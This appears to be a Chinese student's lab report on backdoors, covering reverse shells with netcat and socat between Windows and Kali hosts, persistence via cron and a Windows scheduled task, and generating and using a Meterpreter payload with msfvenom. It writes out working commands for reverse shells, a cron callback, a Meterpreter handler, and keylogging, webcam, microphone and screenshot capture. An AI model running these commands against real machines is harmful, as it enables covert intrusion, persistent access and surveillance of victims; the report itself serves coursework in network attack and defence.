Exp2后门原理与实践_20154305 _ 齐 帅
Exp2后门原理与实践
20154305 _ 齐 帅
2.1简单后门
一、后门工具介绍
1.netcat(nc、ncat)
- 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
2.socat
- 类似于Netcat的加强版。
以上两个工具均可以在老师课件主页的附件中下载
3.Meterpreter
- 利用
Metaspolit
的msfvenom
指令生成后门可执行文件,本实验要生成的这个后门程序就是Meterpreter。
二、ncat、socat的基础操作
2.1 Windows与linux间获取Shell
2.1.1 Windows主机获取 Linux Shell
Windows:
- win主机查本机IP地址:
ipconfig
由上图可见IPv4 地址为:192.168.239.1
2.利用netcat.exe程序监听端口:4305
ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\41491_000\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4305
监听端口4305
kali:
3.使用nc 192.168.239.1 4305 -e /bin/sh
指令反向连接Windows主机的4305端口:
ps:192.168.239.1为win主机地址,即第一步的操作,端口号为自己学号吧
4.Windows执行linux shell指令
此时可以在win_cmd.exe下运行linux 指令
2.1.2 Linux主机获取 Windows shell
Linux :
- 查看kali主机IP地址:
ifconfig
上图可见kali主机IP地址为192.168.239.131
2.输入nc -l -p 4305
指令监听端口
ps:此处忘记截图了。。。
Windows:
3.在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305
命令去连接Linux的4305端口。
ps:IP地址和端口号为linux值,注意需要将cmd目录切换到ncat.exe所在目录下。
4.Linux运行Windows shell
ps:连接成功后便可以在linux主机输入windows指令,正常情况下为乱码,后对编码进行了一下调整。
2.2 ncat进行数据传输
1.Windows输入指令ncat.exe -l 4305
监听
2.Linux输入指令nc 192.168.239.1 4305
连接win主机
3.双向传输字符串
2.3 ncat 定时启动
1.Windows输入指令ncat.exe -l -p 4305
监听
2.Linux输入指令crontab -e
,选择一个文本编辑器打开,在最后一行添加代码:40 * * * * /bin/netcat Win的IP 端口 -e /bin/sh
在每小时的40分运行ncat回连win主机
3.时间到了,可以运行Linux shell指令了
ps:我当时时间设置代码的时间是10:37
2.4 socat 定时启动
1.在Windows桌面按键win+I
,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务
设置如上
2.新建一个触发器
设置如上
3.新建一个操作
设置如上,其中参数为tcp-listen:4305 exec:cmd.exe,pty,stderr
,4305为端口号,因为什么我也不清楚额
4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行
5.Linux输入指令 socat - tcp:192.168.239.1:4305
, windows主机IP、端口号,此时可以获取win的shell命令
三、体验 MSF Meterpreter 功能
3.1 利用msfvenom指令生成后门程序
1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154305_backdoor.exe
,此条指令意为生成一个.exe程序,名称为 20154305_backdoor,将来在windows上运行时会回连到Linux主机相应端口
2.成功之后该文件在当前目录,找到之后拷贝到Windows主机,地址随意
3.2 linux进入控制台进行设置
1.Linux输入指令msfconsole
2.在msf>下输入命令use exploit/multi/handler
3.继续输入set payload windows/meterpreter/reverse_tcp
设置payload
4.输入指令set LHOST Linux IP
5.输入指令 set LPORT 4305
6.输入指令show options
3.3 linux开启监听,windows运行后门
1.Linux输入指令exploit
开始监听
2.windows主机双击后门木马程序执行
ps:也可如上图在win主机cmd中执行
3.4 Linux主机操控Windows主机
3.4.1 输入指令record_mic
录制一段音频
3.4.2 输入指令webcam_snap
拍摄照片
3.4.3 输入指令screenshot
截取屏幕
3.4.4 输入指令keyscan_start
记录击键内容,输入指令keyscan_dump
获取击键记录
下图是我在win主机上输入的内容
3.4.5 输入指令getuid
查看当前用户,输入指令getsystem
提权
四、回答问题
1.例举你能想到的一个后门进入到你系统中的可能方式?
- 从不良网站下载文件时绑定了后门木马
2.例举你知道的后门如何启动起来(win及linux)的方式?
- win中的木马可能伴随软件一同启动,Linux可通过cron启动
3.Meterpreter有哪些给你映像深刻的功能?
记录键盘记录和截屏功能,可能会泄露密码和隐私信息
还有录音和拍照等功能,都会大量泄露隐私
4.如何发现自己有系统有没有被安装后门?
- 安装杀毒软件
五、实验感想
- 这个实验的内容在关闭杀毒软件,并且手动启动后门木马的前提下实现了主机对靶机的控制,能操控的范围还是让我很震撼的,使我发现原来操控一台别人的计算机还是挺简单的事情,不过我在实验中有一个疑问,就是我用两台电脑执行Meterpreter攻击,在监听的时候什么也监听不到,但是两台电脑却可以ping通,希望有机会向老师了解一下,并且还很希望下次的面杀实验。
Exp2后门原理与实践_20154305 _ 齐 帅的更多相关文章
- 20155336 虎光元《网络攻防》Exp2后门原理与实践
20155336 虎光元<网络攻防>Exp2后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shel ...
- Exp2 后门原理与实践 20164321 王君陶
Exp2 后门原理与实践 20164321 王君陶 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过漏洞,点击陌生链接,或者浏览不良网页挂马. 2.例举你知 ...
- 2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践
#2017-2018-2 <网络对抗技术> 20155322 第五周 Exp2 后门原理与实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- 聊聊 HashMap
数据存储底层? 数据底层具体存储是一个Node<K,V> HashMap 是基于哈希来映射的,那当映射冲突时候怎么解决? 链地址,数组+链表 HashMap 什么时候扩容? 负载因子 lo ...
- linux下的dhcp服务器实现
一.得到udhcpd(udhcp服务端): 1.解压busybox 2.配置busybox Networking Utilities——> [*] udhcp server(udhcpd) [* ...
- JAVA企业级服务器应用之Tomcat
Tomcat简介 Tomcat是Apache软件基金会(Apache Software Foundation)的Jakarta项目中的一个核心项目,由Apache,Sun和其他一些公司及个人共同开发而 ...
- 对于在git上面拉代码报"error: RPC failed; curl 56 OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054"解决方法
主要原因是安全设置的问题: 首先执行git config http.sslVerify "false" 若出现下列错误 git config http.sslVerify &q ...
- python之全局变量与局部变量
全局变量: - 在书写中顶格开始: - 一旦定义完毕在整个文件生效: - 在函数内如果定义了同名全局变量名,会“覆盖”掉全局变量: - 在函数中同名的变量,当在函数退出后消失,全局的同 ...
- mysql学习笔记--数据库索引
一.索引的优点:查询速度快 二.索引的缺点: 1. 增.删.改(数据操作语句)效率低了 2. 索引占用空间 三.索引类型: 1. 普通索引 2. 唯一索引(唯一键) 3. 主键索引:只要主键就自动创建 ...
- Java 数据类型与运算符
JAVA数据类型分基本(内置)数据类型和引用数据类型. 区别: 基本数据类型在被创建时,在栈上给其划分一块内存,将数值直接存储在栈上. 引用数据类型在被创建时,首先要在栈上给其引用(句柄)分配一块内存 ...
- Junit集成测试
Spring4.x高级话题(七):Spring的测试 一. 点睛 测试是开发工作中不可缺少的部分,单元测试只针对当前开发的类和方法进行测试,可以简单通过模拟依赖来实现,对运行环境没有依赖:但是仅仅单元 ...
- AWR不能自动生成快照
尝试手工生成,报错sysaux表空间满. BEGIN DBMS_WORKLOAD_REPOSITORY.CREATE_SNAPSHOT (); END; 检查DBA_HIST_SNAPSHOT和dba ...
- qt布局管理-缩放、多窗口切换
关于缩放的布局 所有控件要求与主窗口同时缩放,那么在所有控件设置好布局后,最后点击最外侧的主控件,选择水平布局或者垂直布局即可. 另外每个空间的属性可更改,如SizePolicy用于设置空间是否可缩放 ...